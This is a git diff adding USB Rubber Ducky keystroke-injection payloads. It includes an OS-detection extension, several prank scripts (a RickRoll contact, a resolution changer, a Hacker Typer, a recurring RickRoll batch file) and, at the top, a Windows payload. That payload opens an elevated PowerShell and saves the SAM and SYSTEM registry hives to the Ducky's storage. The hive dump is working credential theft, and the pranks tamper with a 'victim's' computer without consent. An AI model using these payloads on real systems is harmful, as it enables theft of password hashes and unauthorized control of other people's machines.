|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
REM Change $DRIVELABEL to the storage label of your duck
|
||||||
|
DEFINE #DRIVELABEL DUCKY
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-SHIFT-ENTER
|
||||||
|
DELAY 750
|
||||||
|
LEFT
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
STRINGLN reg save HKLM\system $DriveLetter/system.save
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
ALT F4
|
||||||
|
ELSE
|
||||||
|
ATTACKMODE OFF
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
|
@ -0,0 +1,5 @@
|
||||||
|
## 1 Script to Rule Them All
|
||||||
|
|
||||||
|
The purpose of this frankenstein mess is to use OS detection to run conditional code after, specific to the OS.
|
||||||
|
|
||||||
|
It differs from just combining the two extensions in very few ways, but there are slight improvement tweaks from my own testing (hence the new name to avoid conflicts) and more documentation on the process within.
|
|
@ -0,0 +1,293 @@
|
||||||
|
REM Title: One Script To Rule Them All
|
||||||
|
REM Author: Korben and UberGuidoZ
|
||||||
|
REM Description: Attempt to detect OS then run conditional code based on result.
|
||||||
|
REM Target: Windows, macOS, Linux, iOS, ChromeOS, Android, plus custom OS.
|
||||||
|
REM Version: 1.6
|
||||||
|
REM Category: All of them
|
||||||
|
REM Source: https://github.com/UberGuidoZ/Hak5-USBRubberducky-Payloads
|
||||||
|
|
||||||
|
EXTENSION OS_DETECTION_UBER
|
||||||
|
REM VERSION 2.0
|
||||||
|
REM AUTHOR: Korben and UberGuidoZ
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USB Rubber Ducky Host OS Detection (moving target, may fall)
|
||||||
|
Results may vary greatly depending on a combination of many variables:
|
||||||
|
- number of testing stages
|
||||||
|
- specific devices and versions tested against
|
||||||
|
- number of systems testing for (scope)
|
||||||
|
- detection techniques (passive/invisible/active/hybrid)
|
||||||
|
- overall speed
|
||||||
|
- overall accuracy
|
||||||
|
|
||||||
|
If all you require is Windows vs <any other os> detection, the PASSIVE_WINDOWS_DETECT extension is recommended over this one.
|
||||||
|
|
||||||
|
TARGET:
|
||||||
|
DEFAULT - Windows, Mac, Linux
|
||||||
|
ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android, custom defined OS
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Call DETECT_OS_UBER() anywhere in your payload after the extension.
|
||||||
|
Place this extension and the DETECT_OS_UBER() before you would like to first reference $_OS to execute payload code conditionally.
|
||||||
|
|
||||||
|
FEEDBACK:
|
||||||
|
As mentioned above, this a moving target (especially for macOS).
|
||||||
|
Please report any issues identifying specific operating systems with as much detail as possible.
|
||||||
|
Your feedback will greatly help solidify the robustness of this extension and others based on it.
|
||||||
|
|
||||||
|
DEBUGGING:
|
||||||
|
SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION
|
||||||
|
|
||||||
|
REM For Debugging (use if troubleshooting or reporting issues):
|
||||||
|
DEFINE #DEBUGGING_OUTPUT FALSE
|
||||||
|
DEFINE #ADVANCED_DETECTION FALSE
|
||||||
|
|
||||||
|
REM Timing fine tuning:
|
||||||
|
DEFINE #STARTUP_DELAY 1500
|
||||||
|
DEFINE #RESTART_WAIT 1000
|
||||||
|
DEFINE #EXECUTE_DELAY 2000
|
||||||
|
DEFINE #CONNECT_WAIT 1000
|
||||||
|
DEFINE #OS_DETECT_MODE HID
|
||||||
|
REM Define Apple keyboard to keep macOS happy
|
||||||
|
DEFINE #OS_DETECT_VID VID_05AC
|
||||||
|
DEFINE #OS_DETECT_PID PID_021E
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #HOST_RESPONSE_TIMEOUT 1000
|
||||||
|
|
||||||
|
REM Start DETECT_OS function
|
||||||
|
FUNCTION DETECT_OS_UBER()
|
||||||
|
$_HOST_CONFIGURATION_REQUEST_COUNT = 0
|
||||||
|
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
|
||||||
|
DELAY #STARTUP_DELAY
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
|
||||||
|
REM Debugging if TRUE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
IF_DEFINED_TRUE #ADVANCED_DETECTION
|
||||||
|
STRING ADVANCED OS DETECT
|
||||||
|
ELSE_DEFINED
|
||||||
|
STRING OS DETECT
|
||||||
|
END_IF_DEFINED
|
||||||
|
ENTER
|
||||||
|
STRING test caps
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
|
IF ($_CAPSLOCK_ON == FALSE) THEN
|
||||||
|
LED_R
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #HOST_RESPONSE_TIMEOUT
|
||||||
|
END_IF
|
||||||
|
LED_OFF
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING test done
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
|
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING received led response
|
||||||
|
END_IF_DEFINED
|
||||||
|
LED_G
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Prediction: Windows
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = WINDOWS
|
||||||
|
ELSE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Prediction: Linux
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = LINUX
|
||||||
|
END_IF
|
||||||
|
ELSE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING No LED response
|
||||||
|
ENTER
|
||||||
|
STRING Prediciton: MacOS
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = MACOS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #ADVANCED_DETECTION
|
||||||
|
IF ( $_OS == LINUX ) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Soft reconnect
|
||||||
|
END_IF_DEFINED
|
||||||
|
ATTACKMODE OFF
|
||||||
|
DELAY #RESTART_WAIT
|
||||||
|
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
|
||||||
|
DELAY #CONNECT_WAIT
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Reconnected
|
||||||
|
END_IF_DEFINED
|
||||||
|
IF ($_CAPSLOCK_ON == TRUE) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Caps LED on
|
||||||
|
ENTER
|
||||||
|
STRING Test numlock
|
||||||
|
END_IF_DEFINED
|
||||||
|
NUMLOCK
|
||||||
|
DELAY #HOST_RESPONSE_TIMEOUT
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Test done
|
||||||
|
END_IF_DEFINED
|
||||||
|
IF ($_NUMLOCK_ON == FALSE) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING No numlock LED
|
||||||
|
ENTER
|
||||||
|
STRING Prediciton: ChromeOS
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = CHROMEOS
|
||||||
|
ELSE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Numlock LED on
|
||||||
|
ENTER
|
||||||
|
STRING Testing scrolllock
|
||||||
|
END_IF_DEFINED
|
||||||
|
SCROLLLOCK
|
||||||
|
DELAY #HOST_RESPONSE_TIMEOUT
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Test done
|
||||||
|
END_IF_DEFINED
|
||||||
|
IF ($_SCROLLLOCK_ON == TRUE) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Scrolllock LED on
|
||||||
|
ENTER
|
||||||
|
STRING Prediciton: Android
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = ANDROID
|
||||||
|
ELSE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING No scrolllock reply
|
||||||
|
ENTER
|
||||||
|
STRING Prediction: Linux
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = LINUX
|
||||||
|
END_IF
|
||||||
|
END_IF
|
||||||
|
END_IF
|
||||||
|
ELSE IF ($_OS == MACOS) THEN
|
||||||
|
IF ($_CAPSLOCK_ON == TRUE) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Caps LED on
|
||||||
|
ENTER
|
||||||
|
STRING Prediction: iOS
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = IOS
|
||||||
|
ELSE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING No caps reply
|
||||||
|
ENTER
|
||||||
|
STRING Prediction: MacOS
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = MACOS
|
||||||
|
END_IF
|
||||||
|
ELSE IF ($_OS == WINDOWS) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Confident Windows Prediction
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING OS_DETECT complete
|
||||||
|
ENTER
|
||||||
|
END_IF_DEFINED
|
||||||
|
END_FUNCTION
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
EXTENSION HELLO_OS_UBER
|
||||||
|
REM VERSION 2.0
|
||||||
|
REM AUTHOR: Korben and UberGuidoZ
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
For use with OS_DETECTION_UBERExtension, call HELLO_OS_UBER()
|
||||||
|
after DETECT_OS_UBER() prints the OS determination. Make sure
|
||||||
|
your custom conditional code is inserted below where commented.
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM Defining custom $_OS enums if desired
|
||||||
|
DEFINE #EXTRA_EXAMPLES FALSE
|
||||||
|
DEFINE #SOME_OTHER_OS 6
|
||||||
|
DEFINE #ANOTHER_OS 7
|
||||||
|
|
||||||
|
FUNCTION HELLO_OS_UBER()
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
REM Windows code starts here
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN notepad
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN Legit DS3 on Windows
|
||||||
|
REM Windows code ends here
|
||||||
|
ELSE IF ($_OS == MACOS) THEN
|
||||||
|
REM macOS code starts here
|
||||||
|
DELAY 2000
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN TextEdit
|
||||||
|
STRINGLN Legit DS3 on macOS
|
||||||
|
REM macOS code ends here
|
||||||
|
ELSE IF ($_OS == LINUX) THEN
|
||||||
|
REM Linux code starts here
|
||||||
|
DELAY 2000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 100
|
||||||
|
STRINGLN nano
|
||||||
|
STRINGLN Legit DS3 on Linux
|
||||||
|
REM Linux code ends here
|
||||||
|
ELSE IF ($_OS == IOS) THEN
|
||||||
|
REM iOS code starts here
|
||||||
|
REM iOS code ends here
|
||||||
|
ELSE IF ($_OS == CHROMEOS) THEN
|
||||||
|
REM ChromeOS code starts here
|
||||||
|
REM ChromeOS code ends here
|
||||||
|
ELSE IF ($_OS == ANDROID) THEN
|
||||||
|
REM Android code starts here
|
||||||
|
REM Android code ends here
|
||||||
|
IF_DEFINED_TRUE #EXTRA_EXAMPLES
|
||||||
|
ELSE IF($_OS == #SOME_OTHER_OS) THEN
|
||||||
|
REM Custom Other OS code starts here
|
||||||
|
REM Custom Other OS code ends here
|
||||||
|
ELSE IF($_OS == #ANOTHER_OS) THEN
|
||||||
|
REM Another custom Other OS code starts here
|
||||||
|
REM Another custom Other OS code ends here
|
||||||
|
END_IF_DEFINED
|
||||||
|
ELSE
|
||||||
|
REM All else fails code starts here
|
||||||
|
REM All else fails code ends here
|
||||||
|
END_IF
|
||||||
|
END_FUNCTION
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Do the do! Change delay at beginning if desired.
|
||||||
|
|
||||||
|
DETECT_OS_UBER()
|
||||||
|
DELAY #EXECUTE_DELAY
|
||||||
|
HELLO_OS_UBER()
|
|
@ -0,0 +1,66 @@
|
||||||
|
# Create RickRoll Contact - iOS
|
||||||
|
|
||||||
|
This payload is a prank script designed to create a contact named "Ricky Astley" (a nod to the "RickRoll" meme) on an iOS device. It utilizes a dynamic delay mechanism to ensure the system is ready before executing commands. The automated process opens the Contacts app, creates a new contact, and fills in various fields with predefined information: name, last name, phone number, email, website, and other optional details. The fake contact serves as a lighthearted prank, silently inserting a “RickRoll” in the form of a contact entry.
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Create RickRoll Contact
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Prank
|
||||||
|
- **Target**: iOS devices
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
- We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
|
||||||
|
|
||||||
|
```
|
||||||
|
DEFINE #CONTACTS-APP-NAME Contacts
|
||||||
|
DEFINE #CONTACT-NAME Ricky
|
||||||
|
DEFINE #CONTACT-LAST-NAME Astley
|
||||||
|
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
|
||||||
|
```
|
||||||
|
|
||||||
|
- Other optional DEFINEs
|
||||||
|
|
||||||
|
```
|
||||||
|
DEFINE #CONTACT-COMPANY example
|
||||||
|
DEFINE #CONTACT-E-MAIL example
|
||||||
|
DEFINE #CONTACT-WEBSITE-URL example
|
||||||
|
DEFINE #CONTACT-BIRTHDAY example
|
||||||
|
DEFINE #CONTACT-STREET example
|
||||||
|
DEFINE #CONTACT-CITY example
|
||||||
|
DEFINE #CONTACT-STATE example
|
||||||
|
DEFINE #CONTACT-ZIP example
|
||||||
|
DEFINE #CONTACT-COUNTRY example
|
||||||
|
```
|
||||||
|
|
||||||
|
- Note that if you don't want to set some settings you have to remove the piece of code that sets it as well, for istance...
|
||||||
|
|
||||||
|
If you want to remove the zip contact info, you should change this one piece of code from this...
|
||||||
|
|
||||||
|
```
|
||||||
|
REM zip
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-ZIP
|
||||||
|
TAB
|
||||||
|
```
|
||||||
|
|
||||||
|
... to this...
|
||||||
|
|
||||||
|
```
|
||||||
|
REM zip
|
||||||
|
DELAY 250
|
||||||
|
REM STRING #CONTACT-ZIP
|
||||||
|
TAB
|
||||||
|
```
|
||||||
|
|
||||||
|
In this way you are going to ignore this step but without altering the proper flow of available information.
|
||||||
|
|
||||||
|
### How It Works
|
||||||
|
|
||||||
|
1. Sets a user-defined options.
|
||||||
|
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
|
||||||
|
3. After readiness is confirmed, the script:
|
||||||
|
- Runs commands to open **Contacts**.
|
||||||
|
- Executes some commands to sets the new contact information
|
|
@ -0,0 +1,135 @@
|
||||||
|
REM_BLOCK
|
||||||
|
############################################
|
||||||
|
# #
|
||||||
|
# Title : Create RickRoll Contact #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Prank #
|
||||||
|
# Target : iOS #
|
||||||
|
# #
|
||||||
|
############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM @@@ START MANDATORY DEFINEs @@@
|
||||||
|
REM We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
|
||||||
|
|
||||||
|
DEFINE #CONTACTS-APP-NAME Contacts
|
||||||
|
DEFINE #CONTACT-NAME Ricky
|
||||||
|
DEFINE #CONTACT-LAST-NAME Astley
|
||||||
|
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
|
||||||
|
|
||||||
|
REM @@@ START OPTIONAL DEFINEs @@@
|
||||||
|
|
||||||
|
DEFINE #CONTACT-COMPANY example
|
||||||
|
DEFINE #CONTACT-E-MAIL example
|
||||||
|
DEFINE #CONTACT-WEBSITE-URL example
|
||||||
|
DEFINE #CONTACT-BIRTHDAY example
|
||||||
|
DEFINE #CONTACT-STREET example
|
||||||
|
DEFINE #CONTACT-CITY example
|
||||||
|
DEFINE #CONTACT-STATE example
|
||||||
|
DEFINE #CONTACT-ZIP example
|
||||||
|
DEFINE #CONTACT-COUNTRY example
|
||||||
|
|
||||||
|
REM @@@ START PAYLOAD @@@
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||||
|
DELAY 200
|
||||||
|
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN #CONTACTS-APP-NAME
|
||||||
|
DELAY 500
|
||||||
|
GUI n
|
||||||
|
|
||||||
|
REM name
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-NAME
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM last name
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-LAST-NAME
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM company
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-COMPANY
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM phone number
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-PHONE-NUMBER
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM mail
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-E-MAIL
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM url
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-WEBSITE-URL
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM birthday
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-BIRTHDAY
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM street
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-STREET
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM city
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-CITY
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM state
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-STATE
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM zip
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-ZIP
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM country/region
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-COUNTRY
|
||||||
|
TAB
|
||||||
|
GUI q
|
|
@ -3,10 +3,10 @@ REM Title: Hacker Typer
|
||||||
REM Author: UberGuidoZ
|
REM Author: UberGuidoZ
|
||||||
REM Description: Opens a harmless website and types like a hacker
|
REM Description: Opens a harmless website and types like a hacker
|
||||||
REM Target: Windows but easily modified to work on any OS with a browser
|
REM Target: Windows but easily modified to work on any OS with a browser
|
||||||
REM Version: 1.0
|
REM Version: 1.1
|
||||||
REM Category: Prank
|
REM Category: Prank
|
||||||
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
||||||
REM
|
ATTACKMODE HID STORAGE
|
||||||
DELAY 1500
|
DELAY 1500
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
|
@ -0,0 +1,5 @@
|
||||||
|
# Resolution Prank
|
||||||
|
|
||||||
|
This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
|
||||||
|
|
||||||
|
### Somewhat resource dependent, may not work on older computers
|
|
@ -0,0 +1,103 @@
|
||||||
|
REM TITLE Resolution Prank
|
||||||
|
REM AUTHOR Mavisinator30001
|
||||||
|
REM TARGET Any system running Windows 10/11
|
||||||
|
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
IF $_OS != WINDOWS
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
||||||
|
LED_G
|
||||||
|
DELAY 500
|
||||||
|
CTRL GUI d
|
||||||
|
DELAY 500
|
||||||
|
GUI i
|
||||||
|
DELAY 2000
|
||||||
|
STRINGLN display
|
||||||
|
DELAY 2500
|
||||||
|
TAB
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REPEAT 8 TAB
|
||||||
|
ENTER
|
||||||
|
VAR $CAPS_STATE = $_CAPSLOCK_ON
|
||||||
|
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
|
||||||
|
HOLD DOWN
|
||||||
|
DELAY 1000
|
||||||
|
RELEASE DOWN
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
LEFT
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
|
||||||
|
VAR $LIGHT_UP_TIMES = 20
|
||||||
|
WHILE ($LIGHT_UP_TIMES > 0)
|
||||||
|
LED_G
|
||||||
|
DELAY 300
|
||||||
|
LED_OFF
|
||||||
|
DELAY 300
|
||||||
|
LED_R
|
||||||
|
DELAY 300
|
||||||
|
LED_OFF
|
||||||
|
DELAY 300
|
||||||
|
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
|
||||||
|
END_WHILE
|
||||||
|
WAIT_FOR_CAPS_CHANGE
|
||||||
|
END_WHILE
|
||||||
|
DELAY 300
|
||||||
|
REPEAT 12 TAB
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
HOLD UP
|
||||||
|
DELAY 1000
|
||||||
|
RELEASE UP
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
LEFT
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
ALT F4
|
||||||
|
DELAY 200
|
||||||
|
CTRL GUI F4
|
|
@ -5,9 +5,10 @@ REM
|
||||||
REM Description: Creates a batch file that opens a Rick Roll every 5 mins in default browser
|
REM Description: Creates a batch file that opens a Rick Roll every 5 mins in default browser
|
||||||
REM Notes: Creates batch file, starts batch file, minimizes the window
|
REM Notes: Creates batch file, starts batch file, minimizes the window
|
||||||
REM Target: Windows but fairly easily modified to work on any OS with a browser
|
REM Target: Windows but fairly easily modified to work on any OS with a browser
|
||||||
REM Version: 1.3
|
REM Version: 1.5
|
||||||
REM Category: Prank
|
REM Category: Prank
|
||||||
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
|
@ -20,6 +21,7 @@ DELAY 1000
|
||||||
STRING copy con rr.bat
|
STRING copy con rr.bat
|
||||||
ENTER
|
ENTER
|
||||||
STRING @ECHO OFF
|
STRING @ECHO OFF
|
||||||
|
ENTER
|
||||||
STRING PING 127.0.0.1 -n 5 > NUL
|
STRING PING 127.0.0.1 -n 5 > NUL
|
||||||
ENTER
|
ENTER
|
||||||
STRING :LOOP
|
STRING :LOOP
|
||||||
|
@ -30,7 +32,7 @@ STRING PING 127.0.0.1 -n 300 > NUL
|
||||||
ENTER
|
ENTER
|
||||||
STRING GOTO LOOP
|
STRING GOTO LOOP
|
||||||
ENTER
|
ENTER
|
||||||
CTRL C
|
CTRL c
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING cls && rr.bat
|
STRING cls && rr.bat
|
||||||
ENTER
|
ENTER
|
||||||
|
|
|
@ -2,7 +2,8 @@ REM Title: The Matrix Wake Up
|
||||||
REM Description: Recreates the Wake Up Neo terminal scene in The Matrix
|
REM Description: Recreates the Wake Up Neo terminal scene in The Matrix
|
||||||
